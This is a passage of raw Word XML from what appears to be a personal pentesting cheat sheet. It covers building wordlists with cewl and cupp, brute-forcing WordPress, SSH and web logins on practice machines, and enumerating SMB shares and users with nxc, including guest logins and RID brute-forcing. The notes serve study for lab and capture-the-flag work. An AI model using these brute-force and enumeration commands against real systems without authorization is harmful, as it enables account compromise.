          <w:t xml:space="preserve">DC-2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we were given a hint that we would not be able to bruteforce using a typical wordlist, and that we would have to use the tool cewl, which is used to make custom wordlists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001301">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1208"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We brute force to Wordpress using wpscan bruteforce</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cewl http://dc-2/ -w custom_passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001304">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This web scrapes the specified website (which was the website of the target machine), and then it takes words that are likely to be a password and puts it in a file, one word per line, and then it will be ready to be used by like hydra or wpscan, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001305">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it worked for DC-2 PG play, specifically for wpscan brute force</w:t>
      </w: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t xml:space="preserve">Cewl was seen again in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId367">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Lampiao</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, and we knew to use it since the blog post was in portuguese so a normal english wordlist wouldn't work. We used that user's blog post as the wordlist, and the username was the person who posted the blog</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="527"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we bruteforce into SSH</w:t>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t xml:space="preserve">Again used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId368">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Monster</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice. It's a really good tool!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000130C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1293"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We bruteforce into website using burpsutie</w:t>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10">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g4px4ue38auj" w:id="159"/>
      <w:bookmarkEnd w:id="159"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cupp</w:t>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t xml:space="preserve">CUPP is a password profiling tool that generates targeted wordlists by asking for information about a person, organization, or target. Instead of using generic brute-force or massive wordlists like rockyou.txt, CUPP focuses on likely password candidates</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001313">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001314">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It was used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId369">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 which got the password summer2023.</w:t>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t xml:space="preserve">Install it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001317">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="725"/>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1318">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="725"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install cupp</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cupp -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000131B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then it will start asking you questions in order to create this list</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000131C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_96q9tbs19i75" w:id="160"/>
      <w:bookmarkEnd w:id="160"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB (the AD cheatsheet is more updated for SMB)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001321">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB is found on 139 and 445. 139 is for the old version, and 445 is for the new, but usually both are open since 139 is still supplemental stuff that is helpful </w:t>
      </w:r>
    </w:p>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001324">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_z3m346waqvm2" w:id="161"/>
      <w:bookmarkEnd w:id="161"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate SMB using nxc (Net Exec)</w:t>
      </w:r>
    </w:p>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One thing about nxc is that if you see "Pwn3d!" then that means the user is a local admin</w:t>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t xml:space="preserve">The good thing about nxc is that it shows permissions for each share (ex. If you can READ)</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb 10.10.10.10 -u 'guest' -p '' </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000132B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="790"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tries to authenticate SMB using the specified username and password. Here, no password is specified, but you can replace with anything</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000132C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000132D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb 10.10.10.10 -u 'guest' -p '' --shares</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000132E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1164"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tries enumerating with "guest" as username and no password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000132F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1164"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If we don't include any flags, then it just attempts to sign into SMB using username and password, and it will tell you if it's successful or not</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1257300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="382" name="image372.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image372.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37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1332">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Server 2022</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001333">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMBv1 signing is false (SMBv1 false). Only SMBv2+ is supported</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB signing enabled (singing:True). May prevent certain attacks like relay attacks </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001335">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4881563" cy="1282975"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="107" name="image106.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image106.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId371"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4881563" cy="1282975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001336">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="513"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This explains each share</w:t>
      </w:r>
    </w:p>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pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yy1wyz9qobub" w:id="162"/>
      <w:bookmarkEnd w:id="162"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find users in SMB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000133A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000133B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>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 | grep SidTypeUser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000133C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="688"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This second one just looks for the users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000133D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate valid user accounts by brute-forcing RIDs (usually starting at 500 or 1000 and going upward)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000133E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It does this by requesting information about each SID and checking for valid responses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000133F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RID stands for Relative Identifier, and it is part of the Security Identifier (SID) used in Windows to uniquely identify users and groups. Every domain or local user/group has a SID like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001340">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">S-1-5-21-&lt;domain-id&gt;-&lt;rid&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The last part (&lt;rid&gt;) is the RID. Common RIDs include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001342">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">500 → Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001343">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">501 → Guest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001344">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1000+ → Normal user accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001345">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3086100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49" name="image49.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image49.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37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346">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="581"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the output of the rid-brute, and we can see that we got a lot of users. All the users are associated with the "(SidTypeUser)" on the right side</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001347">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="581"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cicada HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,  we had found a password from the SMB share, so now we have usernames so we can brute force the username with the password, by putting these usernames in a text file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001348">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001349">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
